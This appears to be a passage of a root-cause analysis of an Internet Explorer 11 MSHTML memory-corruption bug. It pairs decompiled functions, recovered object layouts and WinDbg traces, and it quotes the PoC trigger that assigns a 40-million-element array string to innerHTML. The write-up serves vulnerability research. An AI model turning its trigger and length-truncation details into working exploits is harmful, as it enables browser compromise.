LONG __thiscall CTreeDataPos::GetTextLength(CTreeDataPos *this)
{
  Tree::TextData *pTextData;
  LONG TextLength;

  pTextData = this->_pTextData;
  if ( pTextData )
    TextLength = pTextData->_cch;
  else
    TextLength = CTreePos::ContentCch(this);
  return TextLength;
}

LONG __thiscall CTreePos::ContentCch(CTreeDataPos *this)
{
  LONG Cch;

  if ( (this->_cElemLeftAndFlags & 8) != 0 && CTreePos::HasCollapsedWhitespace(this) )
    Cch = 1;
  else
    Cch = this->dptp.t._sid_cch & 0x1FFFFFF;
  return Cch;
}
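The size mismatch between the 25-bit and 32-bit length fields can be illustrated with plain bit arithmetic. This is a minimal sketch with hypothetical helper names. It assumes the layout implied by the `& 0x1FFFFFF` mask in the decompiled code: _cch in the low 25 bits and _sid in the high 7 bits of one 32-bit word.

```cpp
#include <cstdint>

// Mask for the 25-bit _cch field, as used by the decompiled code.
constexpr std::uint32_t kCchMask = 0x1FFFFFF;

// Pack a script id and a character count the way a 7:25 bit-field pair would.
// Any bits of cch above bit 24 are silently dropped.
constexpr std::uint32_t pack_sid_cch(std::uint32_t sid, std::uint32_t cch) {
    return ((sid & 0x7F) << 25) | (cch & kCchMask);
}

constexpr std::uint32_t unpack_cch(std::uint32_t sid_cch) {
    return sid_cch & kCchMask;
}

constexpr std::uint32_t unpack_sid(std::uint32_t sid_cch) {
    return sid_cch >> 25;
}
```

A string of 0x0267ffff characters (the length produced by the PoC) does not fit in 25 bits. After packing, the stored count reads back as 0x0067ffff, while a 32-bit field would keep the full value. The two length sources then disagree by 0x02000000 characters.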
CTreeDataPos::AppendText() appends a new string to the end of the existing string.
HRESULT __thiscall CTreeDataPos::AppendText(CTreeDataPos *this, const wchar_t *AppendTextPtr, ULONG AppendTextCch, BOOL a1)
{
  HRESULT hr;
  wchar_t *TargetTextPtr;
  ULONG TargetTextCch;
  Tree::TextData *pTextData;

  hr = 0;
  TargetTextPtr = Tree::TextData::GetText(this->_pTextData, 0, &TargetTextCch);
  pTextData = 0;
  Tree::TextData::Create(TargetTextPtr, TargetTextCch, AppendTextPtr, AppendTextCch, &pTextData);
  if ( pTextData )
    CTreeDataPos::SetTextData(this, pTextData);
  else
    hr = 0x8007000E;
  if ( pTextData )
  {
    if ( pTextData->_ulRefs-- == 1 )
      MemoryProtection::HeapFree(g_hProcessHeap, pTextData);
  }
  return hr;
}
Tree::TextData
Below are the complete members of the IE11 Tree::TextData class object, as I recovered them by reverse engineering.
+0x000 ULONG _ulRefs,
+0x004 LONG _cch,
+0x008 wchar_t _TextData[_cch],
Tree::TextData::AllocateMemory() allocates memory for a Tree::TextData object.
void __fastcall Tree::TextData::AllocateMemory(LONG cch, Tree::TextData **ppTextData)
{
  Tree::TextData *pNewTextData;
  Tree::TextData *pOldTextData;

  pNewTextData = MemoryProtection::HeapAlloc<0>(g_hProcessHeap, 2 * cch + 8);
  if ( pNewTextData )
  {
    pNewTextData->_cch = cch;
    pNewTextData->_ulRefs = 1;
  }
  pOldTextData = *ppTextData;
  *ppTextData = pNewTextData;
  if ( pOldTextData )
  {
    if ( pOldTextData->_ulRefs-- == 1 )
      MemoryProtection::HeapFree(g_hProcessHeap, pOldTextData);
  }
}
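The `2 * cch + 8` expression in the allocation above can be evaluated for the PoC's string to see how large the Tree::TextData block is. This is a minimal sketch with hypothetical helper names. It uses 64-bit arithmetic for clarity, whereas the decompiled function works on a 32-bit LONG.

```cpp
#include <cstdint>

// Length of Array(n).toString() when every slot is empty: n - 1 commas.
constexpr std::uint64_t empty_array_string_length(std::uint64_t n) {
    return n == 0 ? 0 : n - 1;
}

// Bytes requested for a Tree::TextData holding cch UTF-16 code units:
// an 8-byte header (_ulRefs and _cch) followed by 2 bytes per character.
constexpr std::uint64_t text_data_bytes(std::uint64_t cch) {
    return 2 * cch + 8;
}
```

For Array(40370176) the string has 40370175 (0x267FFFF) characters, so the requested block is 80740358 (0x4D00006) bytes, roughly 77 MB.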
Tree::TextData::Create() creates a Tree::TextData object from the string passed in, copies the string into the object's storage, and returns a pointer to the Tree::TextData object.
void __fastcall Tree::TextData::Create(const wchar_t *SourceTextPtr, ULONG SourceTextCch, Tree::TextData **ppTextData)
{
  Tree::TextData::AllocateMemory(SourceTextCch, ppTextData);
  if ( *ppTextData )
    _memcpy_s((*ppTextData)->_TextData, 2 * SourceTextCch, SourceTextPtr, 2 * SourceTextCch);
}
The function below is an overload of the one above. It can append an additional string.
void __fastcall Tree::TextData::Create(const wchar_t *SourceTextPtr, ULONG SourceTextCch, const wchar_t *AdditionalTextPtr, ULONG AdditionalTextCch, Tree::TextData **ppTextData)
{
  Tree::TextData::AllocateMemory(SourceTextCch + AdditionalTextCch, ppTextData);
  if ( *ppTextData )
  {
    _memcpy_s((*ppTextData)->_TextData, 2 * SourceTextCch, SourceTextPtr, 2 * SourceTextCch);
    if ( AdditionalTextPtr )
      _memcpy_s(
        &(*ppTextData)->_TextData[SourceTextCch],
        2 * AdditionalTextCch,
        AdditionalTextPtr,
        2 * AdditionalTextCch);
  }
}
Tree::TextData::GetText() returns the pointer to and the length of the text string in a Tree::TextData object.
wchar_t *__thiscall Tree::TextData::GetText(Tree::TextData *this, ULONG skip_cch, ULONG *GetedCch)
{
  if ( GetedCch )
    *GetedCch = this->_cch - skip_cch;
  return &this->_TextData[skip_cch];
}
CTxtPtr
CTxtPtr derives from CRunPtr<CTxtBlk>. It provides access to the character array in the backing store (that is, CTxtArray).
+0x000 CTxtArray *_prgRun,
+0x004 LONG _iRun,
+0x008 LONG _ich,
+0x00C DWORD _cp,
+0x010 CMarkup *_pMarkup,
CSpliceTreeEngine::RecordSplice() is the function the CSpliceTreeEngine uses to record a splice of the DOM tree. The excerpt below shows how it sets up a CTxtPtr.
HRESULT __thiscall CSpliceTreeEngine::RecordSplice(CSpliceTreeEngine *this)
{
  _this = this;
  hr1 = 0;
  pMarkupSource = this->_pMarkupSource;
  __this = this;
  if ( *(pMarkupSource + 135) < 90000 || (byte_646F1B3E & 0x10) != 0 )
  {
    v65 = 1;
    pTxtPtr = MemoryProtection::HeapAlloc<1>(g_hProcessHeap, 0x14u);
    if ( pTxtPtr )
    {
      tpSourceLCp = CTreePos::GetCpAndMarkup(_this->_ptpSourceL, 0, 0);
      _pMarkupSource = _this->_pMarkupSource;
      pTxtPtr->_pMarkup = _pMarkupSource;
      pTxtPtr->_iRun = 0;
      pTxtPtr->_ich = 0;
      pTxtPtr->_cp = 0;
      pTxtPtr->_prgRun = (_pMarkupSource + 112);
      pTxtPtr->_cp = CTxtPtr::BindToCp(pTxtPtr, tpSourceLCp);
    }
    else
    {
      pTxtPtr = 0;
    }
    pMarkupSource = _this->_pMarkupSource;
  }
  ...
}
The DOM Tree Built by the PoC
The PoC used for debugging here is the unmodified one provided by Ivan Fratric of Google Project Zero.
Start debugging again, attach to the IE process, and after the initial breakpoint is hit, set the following two breakpoints.
;bp MSHTML!CSpliceTreeEngine::RemoveSplice, start address of CSpliceTreeEngine::RemoveSplice()
.text:63A46320 ; HRESULT __thiscall CSpliceTreeEngine::RemoveSplice(CSpliceTreeEngine *this)
.text:63A46320 ?RemoveSplice@CSpliceTreeEngine@@QAEJXZ proc near
.text:63A46320 mov edi, edi
.text:63A46322 push ebp
.text:63A46323 mov ebp, esp
.text:63A46325 and esp, 0FFFFFFF8h
.text:63A46328 sub esp, 240h
.text:63A4632E mov eax, ___security_cookie
.text:63A46333 xor eax, esp
.text:63A46335 mov [esp+240h+var_4], eax

;bp 63A46783, first call to CTreePos::GetCp() near the crash
.text:63A46783 mov ecx, [esi+14h] ; this
.text:63A46786 call ?GetCp@CTreePos@@QAEJXZ ; CTreePos::GetCp(void)
.text:63A4678B mov ecx, [esi+18h] ; this
.text:63A4678E mov edi, 1
.text:63A46793 sub edi, eax
.text:63A46795 call ?GetCp@CTreePos@@QAEJXZ ; CTreePos::GetCp(void)
.text:63A4679A mov ecx, [esi+18h] ; this
.text:63A4679D lea edx, [edi+eax]
The WinDbg output is shown below:
(1940.12fc): Break instruction exception - code 80000003 (first chance)
ntdll!DbgBreakPoint:
00007ffd`64a43150 cc int 3 ;initial breakpoint
0:020> bp MSHTML!CSpliceTreeEngine::RemoveSplice
0:020> bp 63A46783
0:020> g
ModLoad: 00000000`73e10000 00000000`73e9e000 C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.17763.864_none_58922fed78a9e6a7\COMCTL32.dll
ModLoad: 00000000`6f840000 00000000`6fa30000 C:\Windows\SysWOW64\uiautomationcore.dll
ModLoad: 00000000`70020000 00000000`70066000 C:\Windows\SysWOW64\Bcp47Langs.dll
ModLoad: 00000000`72e10000 00000000`72e2f000 C:\Windows\SysWOW64\WLDP.DLL
ModLoad: 00000000`771f0000 00000000`77235000 C:\Windows\SysWOW64\WINTRUST.dll
Breakpoint 0 hit
MSHTML!CSpliceTreeEngine::RemoveSplice:
63a46320 8bff mov edi,edi ;first break, b.innerHTML = Array(40370176).toString();
0:007:x86> g
Breakpoint 0 hit
MSHTML!CSpliceTreeEngine::RemoveSplice:
63a46320 8bff mov edi,edi ;second break, b.innerHTML = "";
0:007:x86> g
MSHTML!CSpliceTreeEngine::RemoveSplice+0x463:
63a46783 8b4e14 mov ecx,dword ptr [esi+14h] ds:002b:04f3ca1c=048a05ac
0:007:x86> r
eax=00000000 ebx=04f3cb38 ecx=04890a80 edx=00000000 esi=04f3ca08 edi=048a05ac
eip=63a46783 esp=04f3c7a8 ebp=04f3c9f0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x463:
63a46783 8b4e14 mov ecx,dword ptr [esi+14h] ds:002b:04f3ca1c=048a05ac ;ecx = 0x048a05ac, CTreePos *_ptpSourceL, <head>
0:007:x86> p
eax=00000000 ebx=04f3cb38 ecx=048a05ac edx=00000000 esi=04f3ca08 edi=048a05ac
eip=63a46786 esp=04f3c7a8 ebp=04f3c9f0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x466:
63a46786 e8dc118900 call MSHTML!CTreePos::GetCp (642d7967) ;eax = 0x00000002, position of <head> in the DOM stream
0:007:x86> p
eax=00000002 ebx=04f3cb38 ecx=00000000 edx=0483d534 esi=04f3ca08 edi=048a05ac
eip=63a4678b esp=04f3c7a8 ebp=04f3c9f0 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
MSHTML!CSpliceTreeEngine::RemoveSplice+0x46b:
63a4678b 8b4e18 mov ecx,dword ptr [esi+18h] ds:002b:04f3ca20=048a0624 ;ecx = 0x048a0624, CTreePos *_ptpSourceR, </body>
0:007:x86> p
eax=00000002 ebx=04f3cb38 ecx=048a0624 edx=0483d534 esi=04f3ca08 edi=048a05ac
eip=63a4678e esp=04f3c7a8 ebp=04f3c9f0 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
MSHTML!CSpliceTreeEngine::RemoveSplice+0x46e:
63a4678e bf01000000 mov edi,1
0:007:x86> p
eax=00000002 ebx=04f3cb38 ecx=048a0624 edx=0483d534 esi=04f3ca08 edi=00000001
eip=63a46793 esp=04f3c7a8 ebp=04f3c9f0 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
MSHTML!CSpliceTreeEngine::RemoveSplice+0x473:
63a46793 2bf8 sub edi,eax
0:007:x86> p
eax=00000002 ebx=04f3cb38 ecx=048a0624 edx=0483d534 esi=04f3ca08 edi=ffffffff
eip=63a46795 esp=04f3c7a8 ebp=04f3c9f0 iopl=0 nv up ei ng nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000297
MSHTML!CSpliceTreeEngine::RemoveSplice+0x475:
63a46795 e8cd118900 call MSHTML!CTreePos::GetCp (642d7967) ;eax = 0x00680004, position of </body> in the DOM stream
0:007:x86> p
eax=00680004 ebx=04f3cb38 ecx=00000000 edx=048a0624 esi=04f3ca08 edi=ffffffff
eip=63a4679a esp=04f3c7a8 ebp=04f3c9f0 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
MSHTML!CSpliceTreeEngine::RemoveSplice+0x47a:
63a4679a 8b4e18 mov ecx,dword ptr [esi+18h] ds:002b:04f3ca20=048a0624
0:007:x86> p
eax=00680004 ebx=04f3cb38 ecx=048a0624 edx=048a0624 esi=04f3ca08 edi=ffffffff
eip=63a4679d esp=04f3c7a8 ebp=04f3c9f0 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
MSHTML!CSpliceTreeEngine::RemoveSplice+0x47d:
63a4679d 8d1407 lea edx,[edi+eax] ;edx = edi+eax = 0x1-0x2+0x00680004 = 0x00680003
0:007:x86> p
eax=00680004 ebx=04f3cb38 ecx=048a0624 edx=00680003 esi=04f3ca08 edi=ffffffff
eip=63a467a0 esp=04f3c7a8 ebp=04f3c9f0 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
MSHTML!CSpliceTreeEngine::RemoveSplice+0x480:
63a467a0 f60104 test byte ptr [ecx],4 ds:002b:048a0624=72
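The arithmetic performed by the traced instructions (mov edi,1 / sub edi,eax / lea edx,[edi+eax]) is the character count of the range between the two tree positions. The following is a minimal sketch of that computation. The function name is hypothetical, and the inputs are the two GetCp() return values from the trace.

```cpp
#include <cstdint>

// Mirrors the traced sequence: edi = 1 - GetCp(left); edx = edi + GetCp(right).
// The result is the number of character positions from left to right, inclusive.
constexpr std::int32_t span_cch(std::int32_t cp_left, std::int32_t cp_right) {
    return 1 - cp_left + cp_right;
}
```

With GetCp(_ptpSourceL) = 2 and GetCp(_ptpSourceR) = 0x00680004, the span is 0x00680003 characters, which is the value left in edx.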
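Starting from the _ptpSourceL and _ptpSourceR arguments passed to the two CTreePos::GetCp() calls near the crash, we can recover every element in the DOM stream by following the doubly linked list formed by the _pLeft and _pRight members of CTreePos and using the offsets of _tpBegin and _tpEnd relative to the start of the CTreeNode object.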
Below is the memory of the CTreeNode for the ROOT tag and of the CTreePos objects for its begin and end tags:
CTreeNode
dd 048a0240
048a0240 04890a80 00000000 7002005f 00000051
048a0250 00000000 00000000 048a05ac 00000000
048a0260 048a02ac 00000062 00000000 00000000
048a0270 048a02c4 048a02c4 00000000 00010004
0x5f = 95, ETAG_ROOT = 95

<ROOT>
CTreePos * = 048a024c
dd 048a024c
048a024c 00000051 00000000 00000000 048a05ac
048a025c 00000000 048a02ac
_cElemLeftAndFlags = 00000051
    ElemLeft = 0x0
    Flags = 0x51 = 0101 0001, NodeBeg=0x1, TPF_LEFT_CHILD=0x10, TPF_EDGE=0x40
_cchLeft = 00000000
_pFirstChild = 00000000
_pNext = 048a05ac, <head>
_pLeft = 00000000
_pRight = 048a02ac, <html>

</ROOT>
CTreePos * = 048a0264
dd 048a0264
048a0264 00000062 00000000 00000000 048a02c4
048a0274 048a02c4 00000000
_cElemLeftAndFlags = 00000062
    ElemLeft = 0x0
    Flags = 0x62 = 0110 0010, NodeEnd=0x2, TPF_LAST_CHILD=0x20, TPF_EDGE=0x40
_cchLeft = 00000000
_pFirstChild = 00000000
_pNext = 048a02c4, </html>
_pLeft = 048a02c4, </html>
_pRight = 00000000
Below is the memory of the CTreeNode for the html tag and of the CTreePos objects for its begin and end tags:
CTreeNode
dd 048a02a0
048a02a0 04890a40 048a0240 7022003a 00000271
048a02b0 00000001 048a024c 0483d534 048a024c
048a02c0 04896c00 00000262 00680002 04896c60
048a02d0 048a05ac 04896c60 048a0264 00030005
0x3a = 58, ETAG_HTML = 58

<html>
CTreePos * = 048a02ac
dd 048a02ac
048a02ac 00000271 00000001 048a024c 0483d534
048a02bc 048a024c 04896c00
_cElemLeftAndFlags = 00000271
    ElemLeft = 0x2
    Flags = 0x71 = 0111 0001, NodeBeg=0x1, TPF_LEFT_CHILD=0x10, TPF_LAST_CHILD=0x20, TPF_EDGE=0x40
_cchLeft = 00000001
_pFirstChild = 048a024c, <ROOT>
_pNext = 0483d534,
_pLeft = 048a024c, <ROOT>
_pRight = 04896c00, Pointer

</html>
CTreePos * = 048a02c4
dd 048a02c4
048a02c4 00000262 00680002 04896c60 048a05ac
048a02d4 04896c60 048a0264
_cElemLeftAndFlags = 00000262
    ElemLeft = 0x2
    Flags = 0x62 = 0110 0010, NodeEnd=0x2, TPF_LAST_CHILD=0x20, TPF_EDGE=0x40
_cchLeft = 00680002
_pFirstChild = 04896c60, Pointer
_pNext = 048a05ac, <head>
_pLeft = 04896c60, Pointer
_pRight = 048a0264, </ROOT>
Below is the memory of the CTreeNode for the head tag and of the CTreePos objects for its begin and end tags:
CTreeNode
dd 048a05a0
048a05a0 04890b80 048a02a0 70020036 00000061
048a05b0 00000000 04896c30 048a02ac 04896c30
048a05c0 048a05c4 00000052 00000000 048a060c
048a05d0 048a0624 048a05ac 048a060c ffffffff
0x36 = 54, ETAG_HEAD = 54

<head>
CTreePos *_ptpSourceL = 048a05ac
dd 048a05ac
048a05ac 00000061 00000000 04896c30 048a02ac
048a05bc 04896c30 048a05c4
_cElemLeftAndFlags = 00000061
    ElemLeft = 0x0
    Flags = 0x61 = 0110 0001, NodeBeg=0x1, TPF_LAST_CHILD=0x20, TPF_EDGE=0x40
_cchLeft = 00000000
_pFirstChild = 04896c30, Pointer
_pNext = 048a02ac, <html>
_pLeft = 04896c30, Pointer
_pRight = 048a05c4, </head>

</head>
CTreePos * = 048a05c4
dd 048a05c4
048a05c4 00000052 00000000 048a060c 048a0624
048a05d4 048a05ac 048a060c
_cElemLeftAndFlags = 00000052
    ElemLeft = 0x0
    Flags = 0x52 = 0101 0010, NodeEnd=0x2, TPF_LEFT_CHILD=0x10, TPF_EDGE=0x40
_cchLeft = 00000000
_pFirstChild = 048a060c, <body>
_pNext = 048a0624, </body>
_pLeft = 048a05ac, <head>
_pRight = 048a060c, <body>
Below is the memory of the CTreeNode for the body tag and of the CTreePos objects for its begin and end tags:
CTreeNode
dd 048a0600
048a0600 0489a3c0 048a02a0 70020012 00000061
048a0610 00000000 00000000 048a05c4 048a05c4
048a0620 04896ae0 00000062 00000000 00000000
048a0630 04896ae0 04896ae0 04896bd0 ffffffff
0x12 = 18, ETAG_BODY = 18

<body>
CTreePos * = 048a060c
dd 048a060c
048a060c 00000061 00000000 00000000 048a05c4
048a061c 048a05c4 04896ae0
_cElemLeftAndFlags = 00000061
    ElemLeft = 0x0
    Flags = 0x61 = 0110 0001, NodeBeg=0x1, TPF_LAST_CHILD=0x20, TPF_EDGE=0x40
_cchLeft = 00000000
_pFirstChild = 00000000
_pNext = 048a05c4, </head>
_pLeft = 048a05c4, </head>
_pRight = 04896ae0, Text

</body>
CTreePos *_ptpSourceR = 048a0624
dd 048a0624
048a0624 00000062 00000000 00000000 04896ae0
048a0634 04896ae0 04896bd0
_cElemLeftAndFlags = 00000062
    ElemLeft = 0x0
    Flags = 0x62 = 0110 0010, NodeEnd=0x2, TPF_LAST_CHILD=0x20, TPF_EDGE=0x40
_cchLeft = 00000000
_pFirstChild = 00000000
_pNext = 04896ae0, Text
_pLeft = 04896ae0, Text
_pRight = 04896bd0, Pointer
以下是DOM流中除了标签结点以外,链入的CTreeDataPos(Text)和CTreeDataPos(Pointer)对象的内存数据:
Pointer
CTreeDataPos * = 04896c30
dd 04896c30
04896c30 00000098 00000000 04896c00 048a02c4
04896c40 04896c00 048a05ac 00000080 00000000
04896c50 00000000 00000000 00000000
_cElemLeftAndFlags = 00000098
    ElemLeft = 0x0
    Flags = 0x98 = 1001 1000, Pointer=0x8, TPF_LEFT_CHILD=0x10, TPF_DATA_POS=0x80
_cchLeft = 00000000
_pFirstChild = 04896c00, Pointer
_pNext = 048a02c4, </html>
_pLeft = 04896c00, Pointer
_pRight = 048a05ac, <head>
_ulRefs_Flags = 00000080
pSmartObject = 00000000
_pTextData = 00000000
_dwPointerAndGravityAndCling = 00000000
---------------------------------------------------------------------------------------------------------------
Pointer
CTreeDataPos * = 04896c60
dd 04896c60
04896c60 00000298 00680002 04896bd0 048a0264
04896c70 04896bd0 048a02c4 00000080 00000000
04896c80 00000000 00000001 00000000
_cElemLeftAndFlags = 00000298
    ElemLeft = 0x2
    Flags = 0x98 = 1001 1000, Pointer=0x8, TPF_LEFT_CHILD=0x10, TPF_DATA_POS=0x80
_cchLeft = 00680002
_pFirstChild = 04896bd0, Pointer
_pNext = 048a0264, </ROOT>
_pLeft = 04896bd0, Pointer
_pRight = 048a02c4, </html>
_ulRefs_Flags = 00000080
pSmartObject = 00000000
_pTextData = 00000000
_dwPointerAndGravityAndCling = 00000001
---------------------------------------------------------------------------------------------------------------
Text
CTreeDataPos * = 04896ae0
dd 04896ae0
04896ae0 000002f4 00000002 048a05c4 04896bd0
04896af0 048a060c 048a0624 00000041 00000000
04896b00 1cf14020 8267ffff 00000000
_cElemLeftAndFlags = 000002f4
    ElemLeft = 0x2
    Flags = 0xf4 = 1111 0100, Text=0x4, TPF_LEFT_CHILD=0x10, TPF_LAST_CHILD=0x20, TPF_DATA2_POS=0x40, TPF_DATA_POS=0x80
_cchLeft = 00000002
_pFirstChild = 048a05c4, </head>
_pNext = 04896bd0, Pointer
_pLeft = 048a060c, <body>
_pRight = 048a0624, </body>
_ulRefs_Flags = 00000041
pSmartObject = 00000000
_pTextData = 1cf14020, Tree::TextData
_sid_cch = 8267ffff
    _cch = 0x8267ffff & 0x1ffffff = 0x67ffff
    _sid = 0x8267ffff >> 25 = 0x41 = 0100 0001
_lTextID = 00000000

!heap -x 1cf14020
Entry User Heap Segment Size PrevSize Unused Flags
-----------------------------------------------------------------------------
000000001cf14018 000000001cf14020 0000000000730000 0000000000730000 4d01000 0 ffa busy extra virtual

dd 1cf14020
1cf14020 00000002 0267ffff 002c002c 002c002c
1cf14030 002c002c 002c002c 002c002c 002c002c
1cf14040 002c002c 002c002c 002c002c 002c002c
1cf14050 002c002c 002c002c 002c002c 002c002c
1cf14060 002c002c 002c002c 002c002c 002c002c
1cf14070 002c002c 002c002c 002c002c 002c002c
1cf14080 002c002c 002c002c 002c002c 002c002c
1cf14090 002c002c 002c002c 002c002c 002c002c
...
dd 1cf14020+0x2680000*2-0x10
21c14010 002c002c 002c002c 002c002c 002c002c
21c14020 002c002c 0000002c 00000000 00000000
_ulRefs = 0x2
_cch = 0x0267ffff = 40370175
_TextData = 2c 00 2c 00 ...
0x21c14026 - 0x1cf14028 = 0x4CFFFFE
0x4CFFFFE/2 = 0x267FFFF = 40370175
---------------------------------------------------------------------------------------------------------------
Pointer
CTreeDataPos * = 04896c00
dd 04896c00
04896c00 000000b8 00000000 00000000 04896c30
04896c10 048a02ac 04896c30 00000040 00000000
04896c20 00000000 04f3ce28 00000000
_cElemLeftAndFlags = 000000b8
    ElemLeft = 0x0
    Flags = 0xb8 = 1011 1000, Pointer=0x8, TPF_LEFT_CHILD=0x10, TPF_LAST_CHILD=0x20, TPF_DATA_POS=0x80
_cchLeft = 00000000
_pFirstChild = 00000000
_pNext = 04896c30, Pointer
_pLeft = 048a02ac, <html>
_pRight = 04896c30, Pointer
_ulRefs_Flags = 00000040
pSmartObject = 00000000
_pTextData = 00000000
_dwPointerAndGravityAndCling = 04f3ce28
---------------------------------------------------------------------------------------------------------------
Pointer
CTreeDataPos * = 04896bd0
dd 04896bd0
04896bd0 000002b8 00680002 04896ae0 04896c60
04896be0 048a0624 04896c60 00000040 00000000
04896bf0 00000000 04f3ce70 00000000
_cElemLeftAndFlags = 000002b8
    ElemLeft = 0x2
    Flags = 0xb8 = 1011 1000, Pointer=0x8, TPF_LEFT_CHILD=0x10, TPF_LAST_CHILD=0x20, TPF_DATA_POS=0x80
_cchLeft = 00680002
_pFirstChild = 04896ae0, Text
_pNext = 04896c60, Pointer
_pLeft = 048a0624, </body>
_pRight = 04896c60, Pointer
_ulRefs_Flags = 00000040
pSmartObject = 00000000
_pTextData = 00000000
_dwPointerAndGravityAndCling = 04f3ce70
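The field annotations in the dump can be reproduced with a few lines of Python. This is only a sketch: the bit layout (flags in the low 8 bits of _cElemLeftAndFlags, a 25-bit _cch below a 7-bit _sid in _sid_cch) is taken from the annotations in the dump, and the helper names are hypothetical.

```python
# Bit values as annotated in the dump above; the dictionary and helper names are hypothetical.
TPF_FLAG_NAMES = {
    0x04: "Text",
    0x08: "Pointer",
    0x10: "TPF_LEFT_CHILD",
    0x20: "TPF_LAST_CHILD",
    0x40: "TPF_DATA2_POS",
    0x80: "TPF_DATA_POS",
}


def decode_elem_left_and_flags(value):
    """Split _cElemLeftAndFlags into (ElemLeft, [names of the flag bits that are set])."""
    flags = value & 0xFF      # low byte holds the flags (assumed from the dump annotations)
    elem_left = value >> 8    # remaining bits hold ElemLeft
    names = [name for bit, name in sorted(TPF_FLAG_NAMES.items()) if flags & bit]
    return elem_left, names


def decode_sid_cch(value):
    """Split DATAPOSTEXT._sid_cch into (_sid, _cch): a 7-bit sid above a 25-bit length."""
    return value >> 25, value & 0x1FFFFFF


print(decode_elem_left_and_flags(0x000002F4))
print([hex(v) for v in decode_sid_cch(0x8267FFFF)])
```

For the Text node at 04896ae0 this yields ElemLeft = 2 with the Text, TPF_LEFT_CHILD, TPF_LAST_CHILD, TPF_DATA2_POS and TPF_DATA_POS bits set, and a stored length of 0x67ffff, although the Tree::TextData object records 0x267ffff characters.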
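From the _pFirstChild and _pNext members of CTreePos, I can reconstruct the DOM tree structure that corresponds to this PoC, as shown in the figure below:
From the _pLeft and _pRight members of CTreePos, I can reconstruct the DOM stream structure that corresponds to this PoC, as shown in the figure below:
Root Cause Analysis
Below is the key part of the WinDbg output from the dynamic debugging session: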
(638.e60): Break instruction exception - code 80000003 (first chance)
ntdll!DbgBreakPoint:
00007ffd`64a43150 cc int 3
0:020> bp MSHTML!CSpliceTreeEngine::RemoveSplice
0:020> bp 63A46783 ; First CTreePos::GetCp() call before the crash
0:020> bp 63A467B5 ; Allocation of the heap block that stores the elements to be removed, operator new[]()
0:020> bp 63A468CF ; Retrieval of the untruncated text length, Tree::TextData::GetText()
0:020> g
Breakpoint 0 hit
MSHTML!CSpliceTreeEngine::RemoveSplice:
63a46320 8bff mov edi,edi ; First break, b.innerHTML = Array(40370176).toString();
0:008:x86> g
Breakpoint 0 hit
MSHTML!CSpliceTreeEngine::RemoveSplice:
63a46320 8bff mov edi,edi ; Second break, b.innerHTML = "";
0:008:x86> g
Breakpoint 1 hit
MSHTML!CSpliceTreeEngine::RemoveSplice+0x463:
63a46783 8b4e14 mov ecx,dword ptr [esi+14h] ds:002b:0508ca1c=04aae54c
0:008:x86> p
eax=00000000 ebx=0508cb38 ecx=04aae54c edx=00000000 esi=0508ca08 edi=04aae54c
eip=63a46786 esp=0508c7a8 ebp=0508c9f0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x466:
63a46786 e8dc118900 call MSHTML!CTreePos::GetCp (642d7967) ; Returns 0x2, the character count of the <ROOT> and <html> tags
0:008:x86> dd ecx-0xc l10 ; CTreeNode, _ptpSourceL (<head>), 0x04aae548 = 0x36 = 54, ETAG_HEAD = 54
04aae540 04a82d40 04aae240 70020036 00000061
04aae550 00000000 04a84b40 04aae24c 04a84b40
04aae560 04aae564 00000052 00000000 04aae5ac
04aae570 04aae5c4 04aae54c 04aae5ac ffffffff
0:008:x86> p
eax=00000002 ebx=0508cb38 ecx=00000000 edx=04a3d534 esi=0508ca08 edi=04aae54c
eip=63a4678b esp=0508c7a8 ebp=0508c9f0 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
MSHTML!CSpliceTreeEngine::RemoveSplice+0x46b:
63a4678b 8b4e18 mov ecx,dword ptr [esi+18h] ds:002b:0508ca20=04aae5c4
0:008:x86> p
eax=00000002 ebx=0508cb38 ecx=04aae5c4 edx=04a3d534 esi=0508ca08 edi=04aae54c
eip=63a4678e esp=0508c7a8 ebp=0508c9f0 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
MSHTML!CSpliceTreeEngine::RemoveSplice+0x46e:
63a4678e bf01000000 mov edi,1
0:008:x86> dd ecx-0x24 l10 ; CTreeNode, _ptpSourceR (</body>), 0x04aae5a8 = 0x12 = 18, ETAG_BODY = 18
04aae5a0 04a86320 04aae240 70020012 00000061
04aae5b0 00000000 00000000 04aae564 04aae564
04aae5c0 04a849f0 00000062 00000000 00000000
04aae5d0 04a849f0 04a849f0 04a84ae0 ffffffff
0:008:x86> p
eax=00000002 ebx=0508cb38 ecx=04aae5c4 edx=04a3d534 esi=0508ca08 edi=00000001
eip=63a46793 esp=0508c7a8 ebp=0508c9f0 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
MSHTML!CSpliceTreeEngine::RemoveSplice+0x473:
63a46793 2bf8 sub edi,eax ; 1-2=-1
0:008:x86> p
eax=00000002 ebx=0508cb38 ecx=04aae5c4 edx=04a3d534 esi=0508ca08 edi=ffffffff
eip=63a46795 esp=0508c7a8 ebp=0508c9f0 iopl=0 nv up ei ng nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000297
MSHTML!CSpliceTreeEngine::RemoveSplice+0x475:
